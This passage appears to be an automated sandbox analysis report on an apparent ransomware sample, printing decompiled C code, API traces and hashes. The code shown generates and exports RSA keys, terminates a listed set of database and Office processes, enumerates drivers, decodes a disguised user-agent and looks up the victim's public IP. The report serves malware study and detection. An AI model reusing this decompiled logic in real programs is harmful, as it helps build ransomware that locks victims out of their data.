                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FC6837E
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC6838C
                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FC6292B), ref: 0FC683A0
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FC6292B), ref: 0FC683AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                        • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                        • API String ID: 3996966626-2152921537
                                        • Opcode ID: 1b459145bd34ae353541e6873e9be96523e3f7ce7fddb8289e2290ddaa9a6c5f
                                        • Instruction ID: 0e253a7663d20da8492f15923749da943d28886e81b67bcf7c14ed8b4efae197
                                        • Opcode Fuzzy Hash: 1b459145bd34ae353541e6873e9be96523e3f7ce7fddb8289e2290ddaa9a6c5f
                                        • Instruction Fuzzy Hash: 4E319571A08209EFDF108FA6DC4BBEEBB78EF44711F144069FA05F6180D7789A108B65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC662B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0FC662B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}









                                        0x0fc662c1
                                        0x0fc662c5
                                        0x0fc662cd
                                        0x0fc66305
                                        0x0fc66313
                                        0x0fc66317
                                        0x0fc6631f
                                        0x0fc6631f
                                        0x0fc66322
                                        0x0fc6633b
                                        0x0fc66353
                                        0x0fc6635d
                                        0x0fc66369
                                        0x0fc6637e
                                        0x00000000
                                        0x0fc66384
                                        0x0fc662cf
                                        0x0fc662da
                                        0x00000000
                                        0x0fc662fe
                                        0x0fc662eb
                                        0x0fc662f3
                                        0x00000000
                                        0x0fc662fc
                                        0x00000000

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(0FC649CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,0FC649C6,?,0FC649CE), ref: 0FC662C5
                                        • GetLastError.KERNEL32(?,0FC649CE), ref: 0FC662CF
                                        • CryptAcquireContextW.ADVAPI32(0FC649CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FC649CE), ref: 0FC662EB
                                        • CryptGenKey.ADVAPI32(0FC649CE,0000A400,08000001,?,?,0FC649CE), ref: 0FC66317
                                        • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0FC6633B
                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0FC66353
                                        • CryptDestroyKey.ADVAPI32(?), ref: 0FC6635D
                                        • CryptReleaseContext.ADVAPI32(0FC649CE,00000000), ref: 0FC66369
                                        • CryptAcquireContextW.ADVAPI32(0FC649CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0FC6637E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                        • API String ID: 137402220-1948191093
                                        • Opcode ID: ef4b6fede264b1eb588b787d4d84579ae96539a849708fdb2b9aa4ca602ea959
                                        • Instruction ID: f85b284154f0687b773d20317f2ab2f9188a350b30da5406d0fae8422d637a86
                                        • Opcode Fuzzy Hash: ef4b6fede264b1eb588b787d4d84579ae96539a849708fdb2b9aa4ca602ea959
                                        • Instruction Fuzzy Hash: DA21447579830ABBDB20CEE1DD8BFDA3769AB48B11F004518F702EA1C0D6B5A9109761
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC646F0 Relevance: 15.1, APIs: 10, Instructions: 114processmemorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 98%
                                        			E0FC646F0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}
























































                                        0x0fc646f6
                                        0x0fc64703
                                        0x0fc6470b
                                        0x0fc64713
                                        0x0fc6471b
                                        0x0fc64723
                                        0x0fc6472b
                                        0x0fc64733
                                        0x0fc6473b
                                        0x0fc64743
                                        0x0fc6474b
                                        0x0fc64753
                                        0x0fc6475b
                                        0x0fc64763
                                        0x0fc6476b
                                        0x0fc64773
                                        0x0fc6477b
                                        0x0fc64783
                                        0x0fc6478b
                                        0x0fc64793
                                        0x0fc6479b
                                        0x0fc647a3
                                        0x0fc647ab
                                        0x0fc647b3
                                        0x0fc647bb
                                        0x0fc647c3
                                        0x0fc647cb
                                        0x0fc647d3
                                        0x0fc647de
                                        0x0fc647e9
                                        0x0fc647f4
                                        0x0fc647ff
                                        0x0fc6480a
                                        0x0fc64815
                                        0x0fc64820
                                        0x0fc6482b
                                        0x0fc64836
                                        0x0fc64841
                                        0x0fc6484c
                                        0x0fc64857
                                        0x0fc64862
                                        0x0fc64874
                                        0x0fc64878
                                        0x0fc6487c
                                        0x0fc64882
                                        0x0fc64886
                                        0x0fc64888
                                        0x0fc64891
                                        0x0fc64893
                                        0x0fc64895
                                        0x0fc64895
                                        0x0fc64891
                                        0x0fc648a1
                                        0x0fc648a1
                                        0x0fc648a4
                                        0x0fc648a4
                                        0x0fc648b0
                                        0x0fc648b5
                                        0x0fc648bd
                                        0x0fc648cb
                                        0x0fc648cf
                                        0x0fc648d4
                                        0x0fc648e1
                                        0x0fc648e1
                                        0x0fc648cf
                                        0x0fc648eb
                                        0x0fc648ec
                                        0x0fc648ec
                                        0x0fc648ef
                                        0x0fc648f4
                                        0x0fc648fa
                                        0x0fc64900
                                        0x0fc64900
                                        0x0fc64903
                                        0x0fc64909
                                        0x0fc64913
                                        0x0fc64913
                                        0x0fc6491a
                                        0x0fc64922

                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0FC64862
                                        • VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0FC6487C
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 0FC64895
                                        • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FC648B5
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FC648C5
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0FC648D4
                                        • CloseHandle.KERNEL32(00000000), ref: 0FC648E1
                                        • Process32NextW.KERNEL32(?,00000000), ref: 0FC648FA
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC64913
                                        • FindCloseChangeNotification.KERNEL32(?), ref: 0FC6491A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
                                        • String ID:
                                        • API String ID: 3023235786-0
                                        • Opcode ID: d9d20d999dc09a0e37b78bf6c9bda6b10b170ee03489e5654966fa42e4aa697f
                                        • Instruction ID: ab16657f7f43fe7fcb2553df3ea5b27f9958cc229e0f30bafb7bee9782ce717a
                                        • Opcode Fuzzy Hash: d9d20d999dc09a0e37b78bf6c9bda6b10b170ee03489e5654966fa42e4aa697f
                                        • Instruction Fuzzy Hash: 015168F500C381DFD6208F19A8CA75ABBE4BB86318F50490CE698AA252E7709C09CF56
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC66E90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0FC67CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FC67EC4
                                          • Part of subcall function 0FC67CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FC67EDD
                                        • VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0FC66EAF
                                        • lstrlenW.KERNEL32(0FC6FF0C), ref: 0FC66EBC
                                          • Part of subcall function 0FC67EF0: InternetCloseHandle.WININET(?), ref: 0FC67F03
                                          • Part of subcall function 0FC67EF0: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FC67F22
                                        • lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0FC6FF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FC66EEB
                                        • wsprintfW.USER32 ref: 0FC66F03
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0FC6FF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FC66F19
                                        • InternetCloseHandle.WININET(?), ref: 0FC66F27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
                                        • String ID: GET$ipv4bot.whatismyipaddress.com
                                        • API String ID: 4289327240-2259699238
                                        • Opcode ID: 2db78090eafd015a20e3ef7c3d642e34dbfb89742043c907d929490aeb512dca
                                        • Instruction ID: e40367ba33b0feccf787ac5c489528c5b77e4f65ed91352b04182680365b3cfb
                                        • Opcode Fuzzy Hash: 2db78090eafd015a20e3ef7c3d642e34dbfb89742043c907d929490aeb512dca
                                        • Instruction Fuzzy Hash: 6601963164C20577DB106A66AD8FF9B3B68EF85B11F000434FA05E5082DE685515D7B6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC62F50 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 46%
                                        			E0FC62F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

















                                        0x0fc62f5a
                                        0x0fc62f69
                                        0x0fc62f6d
                                        0x0fc62f74
                                        0x0fc62f76
                                        0x0fc62f7b
                                        0x0fc62f8d
                                        0x0fc62f93
                                        0x0fc62f97
                                        0x0fc62fa8
                                        0x0fc62fac
                                        0x0fc62ff2
                                        0x0fc62ffa
                                        0x0fc63008
                                        0x0fc62fae
                                        0x0fc62fb1
                                        0x0fc62fb3
                                        0x0fc62fb8
                                        0x0fc62fc0
                                        0x0fc62fc5
                                        0x0fc62fcf
                                        0x0fc62fd7
                                        0x00000000
                                        0x0fc62fd9
                                        0x0fc62fe3
                                        0x0fc62feb
                                        0x0fc63011
                                        0x0fc63022
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc62feb
                                        0x00000000
                                        0x0fc62fed
                                        0x0fc62fed
                                        0x0fc62fee
                                        0x0fc62fc0
                                        0x00000000
                                        0x0fc62fb8
                                        0x0fc62f99
                                        0x0fc62f9e
                                        0x0fc62f9e
                                        0x0fc62f81
                                        0x0fc62f81
                                        0x0fc62f81
                                        0x00000000

                                        APIs
                                        • K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0FC62F74
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FC62F8D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocDeviceDriversEnumVirtual
                                        • String ID:
                                        • API String ID: 4140748134-0
                                        • Opcode ID: 2821def18e64fd35a9f72ca27c32925df46da591f3ffe66807b8f7bcdf869a13
                                        • Instruction ID: a84540aa34a75a02bd2194caed1542ecdef663683433d5b6ac3ceb6288a85ad6
                                        • Opcode Fuzzy Hash: 2821def18e64fd35a9f72ca27c32925df46da591f3ffe66807b8f7bcdf869a13
                                        • Instruction Fuzzy Hash: EB210131A08119FBDF20DE99DC82FED77BCEB44711F000196FE04E6140DB75A6159791
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC67CE0 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 91 fc67ce0-fc67ecb InternetOpenW 92 fc67ee2-fc67ee8 91->92 93 fc67ecd-fc67edf InternetOpenW 91->93 93->92
                                        C-Code - Quality: 100%
                                        			E0FC67CE0(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}




























































                                        0x0fc67cf8
                                        0x0fc67d04
                                        0x0fc67d0f
                                        0x0fc67d19
                                        0x0fc67d23
                                        0x0fc67d2d
                                        0x0fc67d37
                                        0x0fc67d41
                                        0x0fc67d4b
                                        0x0fc67d55
                                        0x0fc67d5f
                                        0x0fc67d69
                                        0x0fc67d73
                                        0x0fc67d7d
                                        0x0fc67d87
                                        0x0fc67d91
                                        0x0fc67d9b
                                        0x0fc67da5
                                        0x0fc67daf
                                        0x0fc67db9
                                        0x0fc67dc3
                                        0x0fc67dcd
                                        0x0fc67dd7
                                        0x0fc67de1
                                        0x0fc67deb
                                        0x0fc67df2
                                        0x0fc67df9
                                        0x0fc67e00
                                        0x0fc67e07
                                        0x0fc67e0e
                                        0x0fc67e15
                                        0x0fc67e1c
                                        0x0fc67e23
                                        0x0fc67e2a
                                        0x0fc67e31
                                        0x0fc67e38
                                        0x0fc67e3f
                                        0x0fc67e46
                                        0x0fc67e4d
                                        0x0fc67e54
                                        0x0fc67e5b
                                        0x0fc67e62
                                        0x0fc67e69
                                        0x0fc67e70
                                        0x0fc67e77
                                        0x0fc67e7e
                                        0x0fc67e85
                                        0x0fc67e8c
                                        0x0fc67e93
                                        0x0fc67e9a
                                        0x0fc67ea1
                                        0x0fc67ea8
                                        0x0fc67eaf
                                        0x0fc67eb6
                                        0x0fc67ebd
                                        0x0fc67ec4
                                        0x0fc67ec6
                                        0x0fc67ecb
                                        0x0fc67edd
                                        0x0fc67edf
                                        0x00000000
                                        0x0fc67edf
                                        0x0fc67ee8

                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FC67EC4
                                        • InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FC67EDD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
                                        • API String ID: 2038078732-2805935662
                                        • Opcode ID: 227d1d5479a0513349432d090e510f37f2b580f3f2ee0081288b6a91835eb252
                                        • Instruction ID: d63dbb9fdcd57da487b53ac6f17e776fc66c3774420fc36fd9a6d56382f8d89d
                                        • Opcode Fuzzy Hash: 227d1d5479a0513349432d090e510f37f2b580f3f2ee0081288b6a91835eb252
                                        • Instruction Fuzzy Hash: 5B41A8B4811359DEEB21CF919998B9EBFF5BB04748F50819ED5086B201C7F60A89CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC66F40 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196stringmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 94 fc66f40-fc66f58 95 fc66f7c-fc66f7f 94->95 96 fc66f5a-fc66f7a lstrcatW * 4 94->96 97 fc66f81-fc66f9b lstrcatW * 4 95->97 98 fc66f9d-fc66fa1 95->98 96->95 97->98 99 fc66fa3-fc66fbd lstrcatW * 4 98->99 100 fc66fbf-fc66fc3 98->100 99->100 101 fc66fc5-fc66fdf lstrcatW * 4 100->101 102 fc66fe1-fc66fe5 100->102 101->102 103 fc66fe7-fc67001 lstrcatW * 4 102->103 104 fc67003-fc67007 102->104 103->104 105 fc67025-fc67029 104->105 106 fc67009-fc67023 lstrcatW * 4 104->106 107 fc67047-fc6704b 105->107 108 fc6702b-fc67045 lstrcatW * 4 105->108 106->105 109 fc6704d-fc67067 lstrcatW * 4 107->109 110 fc67069-fc6706d 107->110 108->107 109->110 111 fc6706f-fc67089 lstrcatW * 4 110->111 112 fc6708b-fc6708f 110->112 111->112 113 fc67091-fc670aa VirtualAlloc 112->113 114 fc670fc-fc67100 112->114 117 fc670c1-fc670cd wsprintfW 113->117 118 fc670ac-fc670bf wsprintfW 113->118 115 fc67102-fc6711c lstrcatW * 4 114->115 116 fc6711e-fc67132 lstrlenW 114->116 115->116 119 fc670d0-fc670f6 lstrcatW * 4 VirtualFree 117->119 118->119 119->114
                                        C-Code - Quality: 100%
                                        			E0FC66F40(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
